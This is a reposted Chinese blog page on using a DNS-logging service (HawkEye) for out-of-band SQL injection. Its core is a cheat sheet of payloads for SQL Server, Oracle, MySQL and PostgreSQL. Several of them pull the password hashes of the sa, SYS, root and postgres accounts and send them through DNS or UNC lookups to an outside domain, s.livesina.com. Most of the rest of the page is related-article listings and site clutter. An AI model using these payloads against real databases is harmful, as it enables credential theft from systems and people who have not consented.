HawkEye Log/Dns 在Sql注入中的应用

最新推荐文章于 2024-07-12 13:45:39 发布
最新推荐文章于 2024-07-12 13:45:39 发布
阅读量98 收藏
点赞数
文章标签: 运维 数据库
原文链接:http://www.cnblogs.com/cplushua/articles/HawkEye-LogDns-zaiSql-zhu-ru-zhong-de-ying-yong.html
版权

Hawkeye: http://hawkeye.hackinglab.cn/

支持的数据库类型

  • SQL Server
  • Mysql
  • Oracl
  • PostgresSQL

注入姿势

SQL Server

Example:

DECLARE @host varchar(1024);
  SELECT @host=(SELECT TOP 1
master.dbo.fn_varbintohexstr(password_hash)
FROM sys.sql_logins WHERE name='sa')
+'.s.livesina.com';
  EXEC('master..xp_dirtree
"\\'+@host+'\foobar$"');

Oracle

Example1:

SELECT UTL_INADDR.GET_HOST_ADDRESS('test.y.s.livesina.com');

Example2:

SELECT UTL_HTTP.REQUEST('http://test.y.livesina.com/test') FROM DUAL;

Example3:

SELECT UTL_HTTP.REQUEST('http://test.y.livesina.com/test') FROM DUAL;

Example4:

SELECT HTTPURITYPE('http://test.y.livesina.com/test').GETCLOB() FROM DUAL;

Example5:

SELECT DBMS_LDAP.INIT(('test.s.livesina.com',80) FROM DUAL;

Example6:

 SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.s.livesina.com',80) FROM DUAL;

Mysql

Exmaple:

SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.s.livesina.com\\abc'));

PostgreSQL

Example:

DROP TABLE IF EXISTS table_output;
   CREATE TABLE table_output(content text);
   CREATE OR REPLACE FUNCTION temp_function()
   RETURNS VOID AS $$
   DECLARE exec_cmd TEXT;
   DECLARE query_result TEXT;
BEGIN
   SELECT INTO query_result (SELECT passwd
FROM pg_shadow WHERE usename='postgres');
   exec_cmd := E'COPY table_output(content)
FROM E\'\\\\\\\\'||query_result||E'.s.livesina.com\\\\foobar.txt\'';
   EXECUTE exec_cmd;
   END;
   $$ LANGUAGE plpgsql SECURITY DEFINER;
   SELECT temp_function();

转载于:https://www.cnblogs.com/cplushua/articles/HawkEye-LogDns-zaiSql-zhu-ru-zhong-de-ying-yong.html

weixin_30911451
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网络安全方向相关课题和材料
学-> 思->用
10-30 1096
搜集大量网络安全行业开源项目一个是关注互联网企业/团队的安全开源项目,经企业内部实践,这些最佳实践值得借鉴。一个是来自企业安全能力建设的需求,根据需求分类,如WAF、HIDS、Git监控等。这个收集是一个长期的过程,我在GitHub创建了这个项目,专门用来收集一些优秀的甲方安全项目。还有很多很好的免费开源项目可供选择,下面列出的还只是其很少的一部分,我将持续更新这个项目,欢迎Star。
Linux排查服务器是否已经被入侵
球球的博客
02-02 811
linux 安全
Linux 日志
名猿妮的博客
05-21 252
Linux 日志 目录 Linux 日志 主要日志文件分类 级别(由轻到重) pm2相关日志 日志配置文件 在Linux系统当,有三个主要的日志子系统 日志保存的位置 日志文件的安全性 日志轮询 journalctl命令 主要日志文件分类 内核及公共消息日志:/var/log/messages 计划任务日志:/var/log/cron 系统引导日志:/var/log/dmesg 邮件系统日志:/var/log/maillog 用户登录日志:/var/log/lastlog
github代码外泄监控——Hawkeye
weixin_34249678的博客
01-18 999
2019独角兽企业重金招聘Python工程师标准>>> ...
linuxboot.log,messages,secure,dnf,cron日志文件的作用
qq_37441443的博客
03-27 4185
/var/log/boot.log 与系统启动相关的信息的仓库 /var/log/syslog 或/var/log/messages 包含系统相关信息,几乎包含所有活动数据的信息,基于redhat的linux实用message,而基于debian的(比如ubuntu),使用syslog。 /var/log/auth.log 或/var/log/secure** 存储认证相关信息,包括成功和失败的登录和认证。根据系统类型不同,基于debian的(如ubuntu),在/var/log/auth.log,基于
Hawkeye部署Github监控系统
weixin_34281537的博客
08-13 966
2019独角兽企业重金招聘Python工程师标准>>> ...
HawkEye:GitHub通知的有用应用程序
02-04
要开始尝试鹰眼,请在“上下载适合您平台的最新版本。 然后,当有新更新可用时,您将能够自动更新。 注意:这目前仅适用于Windows传入的macOS。 屏幕截图 暗模式 灯光模式 贡献 有关对该项目做出贡献的信息,请阅读...
Camera Town/Hawkeye-开源
05-02
【Camera Town/Hawkeye-开源】项目是一个专为资源受限环境设计的摄像机监视系统,它具有在星际之门(ARM)平台上处理多摄像头源的能力,并能够进行更改检测监控。这一系统的开源特性使得开发者和爱好者可以自由地...
Hawkeye
10-28
Hawkeye.TTF文件就是Hawkeye字体的TrueType版本,用户可以将其安装在操作系统,以便在各种应用程序使用这个字体。这种字体格式被广泛支持,适用于Windows和Mac OS等操作系统。 3. **Hawkeye字体特点** 虽然...
Acorns.Hawkeye.125.N2
06-21
《Acorns.Hawkeye.125.N2——深入解析反编译技术在Acorns系统应用》 Acorns.Hawkeye.125.N2,这个名字看似神秘,实际上它代表了一种专用于Acorns系统的反编译工具。Acorns系统,作为一个早期的个人计算机操作...
Hawkeye2:Hawkeye-.Net运行时对象编辑器
05-11
鹰眼2 ... Hawkeye可以注入到任何.NET进程,从而使您可以轻松地挂钩和修改其他进程。 您甚至可以连接到Visual Studio并修改其某些(.NET)属性(例如:VS的“属性编辑器”)。 从1.1.9版开始,Hawke
linux centos7清除系统日志、历史记录、登录信息
热门推荐
魔拉宝
10-01 1万+
平时不管是web还是系统产生的日志都可能导致洗盘爆满,所以我在这里分享一些基本常用清理linux日志的方法。 # echo > /var/log/wtmp //清除用户登录记录 # echo > /var/log/btmp //清除尝试登录记录 # echo>/var/log/lastlog //清除最近登录信息 # echo > /var/log/secure //登...
聊聊如何在内网下构建大模型微调环境
最新发布
python1234567_的博客
07-12 674
LlamaFactory新版更新后,还是比较方便,只是说llamafactory-cli命令的确是有点蒙,踩个坑就好了。对于LlamaFactory微调来说,本身不难,毕竟都是配置;主要是在内网环境下的依赖包拉取安装是真麻烦,但其实也还好。走一遍的话,还是可以学到很多的。​。
设备运维、教学直播...浅析远程控制在医疗专网环境下的应用
oray2013的专栏
07-11 377
随着跨院会诊的需求出现,安全高清的远程是为患者提供更加专业和全面的诊断意见的必要条件,医院内网下设备部署向日葵Q2Pro,同时为各类医院科室专家分配向日葵账号,当有远程诊疗需求发生时,医生仅需添加指定设备,即可在手机或电脑上发起远程操作,实时获取患者的检查数据,及时响应任何紧急情况。向日葵的远程系统采用了先进的RSA&AES非对称加密技术和安全协议,确保所有的数据传输都是安全的,其次使用控控接入医院内部的设备终端,使得控控上网,医院内部设备不联网,高度保障了医院内部的数据安全不被未授权访问。
昇腾环境下使用docker部署mindie-service
yuanlulu的博客
07-08 328
MindIE是基于昇腾硬件的运行加速、调试调优、快速迁移部署的高性能深度学习推理框架。它包含了MindIE-Service、MindIE-Torch和MindIE-RT等组件。我主要用MindIE-Service的功能,这个组件对标的是vllm这样的大语言推理框架。
Boost Security with SSH/SFTP Public
q2315702359的博客
07-08 1825
  SocketTools .NET Edition eliminates password vulnerabilities and simplifies access management for secure file transfers and server communication.  SocketTools .NET Edition by Catalyst Development Corp. is a development library designed to simplify adding
【北京迅为】《i.MX8MM嵌入式Linux开发指南》-第一篇 嵌入式Linux入门篇-第二十六章 安装超级终端软件
BeiJingXunWei的博客
07-11 490
USB 转串口,也叫‘U 转串’,可以把没有串口的电脑虚拟一个串口出来,这样就让电脑具备了串口的功能,从而可以使得开发板和 PC 之间通过串口通讯了。(这里需要提醒一下,用户插入的 USB 接口不一样,显示的端口号也会不一样,大家只需要关注‘USB 转串口’插入后,增加的那一个串口号,这个增加的串口号需要大家记住,在超级终端的设置会用到。首先使用串口线连接到开发板的串口(红色箭头指的地方),串口线的另一端连接U转串口,然后连接到电脑usb口上,连接方式如图所示,图片上连接的串口是调试串口。
Sophon:智能OLAP缓存层技术实践(26页).pdf
03-04
文档首先由Anning Luo介绍了 Hulu 公司在大数据领域的应用背景。Hulu,作为一家知名流媒体服务提供商,拥有庞大的数据基础设施,包括内部数据心的Hadoop、Spark、Hive、Yarn、Hbase等系统,以及云端的数据服务如S3...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值